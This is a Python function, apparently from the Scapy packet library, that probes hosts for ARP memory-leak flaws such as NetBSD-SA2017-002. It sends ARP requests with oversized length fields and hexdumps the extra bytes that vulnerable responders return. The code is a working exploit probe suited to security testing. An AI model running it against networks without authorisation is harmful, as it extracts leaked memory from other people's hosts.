Exploit ARP leak flaws, like NetBSD-SA2017-002. https://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2017-002.txt.asc
@conf.commands.register
def arpleak(target, plen=255, hwlen=255, **kargs):
    # type: (str, int, int, **Any) -> Tuple[SndRcvList, PacketList]
    """Exploit ARP leak flaws, like NetBSD-SA2017-002.

    https://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2017-002.txt.asc

    Sends ARP requests whose ``plen`` / ``hwlen`` length fields carry the
    given values (255 by default, i.e. oversized) instead of the standard
    4 (IPv4) and 6 (Ethernet), then hexdumps whatever bytes a replying host
    returns in its ``psrc`` / ``hwsrc`` fields beyond those standard
    lengths. Those trailing bytes are the suspected leak: a correctly
    behaving responder has nothing to put there.

    :param target: destination handed to ``ARP(pdst=...)``. The packet is
        iterated, so a target that expands to several addresses presumably
        yields one request per address (confirm against Scapy's Net
        handling).
    :param plen: value written to the ARP ``plen`` field. 4 keeps the
        request well-formed; any other value stores the protocol addresses
        as raw bytes cut to that length (for plen > 4 the cut is a no-op,
        so a 4-byte address travels with an oversized length field).
    :param hwlen: value written to the ARP ``hwlen`` field; 6 is the
        well-formed Ethernet value, anything else is handled like plen.
    :param kargs: forwarded unchanged to :func:`srp` (timeout, verbose, ...).
    :return: ``(ans, unans)`` -- answered pairs (listname "Results") and
        unanswered packets (listname "Unanswered"), merged over every
        interface that was used.

    Side effects: transmits on each interface the targets route through
    and prints to stdout for every reply carrying oversized address data.
    """
    # We want explicit packets: one fully specified frame per target,
    # grouped by the interface it will be sent from.
    pkts_iface = {}  # type: Dict[str, List[Packet]]
    for pkt in ARP(pdst=target):
        # We have to do some of Scapy's work since we mess with
        # important values: with a non-standard plen/hwlen the source
        # addresses are filled in here rather than left to Scapy.
        iface = conf.route.route(pkt.pdst)[0]
        psrc = get_if_addr(iface)
        hwsrc = get_if_hwaddr(iface)
        # Length fields are assigned before the address fields on purpose;
        # presumably Scapy decides how psrc/pdst are stored from plen, so
        # keep this order.
        pkt.plen = plen
        pkt.hwlen = hwlen
        if plen == 4:
            # Standard IPv4 length: the dotted-quad string is kept as is.
            pkt.psrc = psrc
        else:
            # Non-standard length: raw packed bytes, truncated to plen.
            pkt.psrc = inet_aton(psrc)[:plen]
            pkt.pdst = inet_aton(pkt.pdst)[:plen]
        if hwlen == 6:
            # Standard Ethernet length: MAC string kept as is.
            pkt.hwsrc = hwsrc
        else:
            # Same treatment for the hardware address.
            pkt.hwsrc = mac2str(hwsrc)[:hwlen]
        # Explicit Ethernet header: our MAC as source, broadcast destination.
        pkts_iface.setdefault(iface, []).append(
            Ether(src=hwsrc, dst=ETHER_BROADCAST) / pkt
        )
    # Send per interface and merge every interface's results into two lists.
    ans, unans = SndRcvList(), PacketList(name="Unanswered")
    for iface, pkts in pkts_iface.items():
        # Only ARP traffic is sniffed as candidate answers.
        ans_new, unans_new = srp(pkts, iface=iface, filter="arp", **kargs)
        ans += ans_new
        unans += unans_new
    ans.listname = "Results"
    unans.listname = "Unanswered"
    # Report: for each ARP reply, dump whatever the responder put in its
    # address fields past the standard 4 (IPv4) / 6 (MAC) bytes.
    for _, rcv in ans:
        if ARP not in rcv:
            continue
        rcv = rcv[ARP]
        # i2m converts the field's internal value to its wire form, so the
        # length check below sees the actual field size, not a decoded
        # string.
        psrc = rcv.get_field('psrc').i2m(rcv, rcv.psrc)
        if plen > 4 and len(psrc) > 4:
            print("psrc")
            hexdump(psrc[4:])
            print()
        hwsrc = rcv.get_field('hwsrc').i2m(rcv, rcv.hwsrc)
        if hwlen > 6 and len(hwsrc) > 6:
            print("hwsrc")
            hexdump(hwsrc[6:])
            print()
    return ans, unans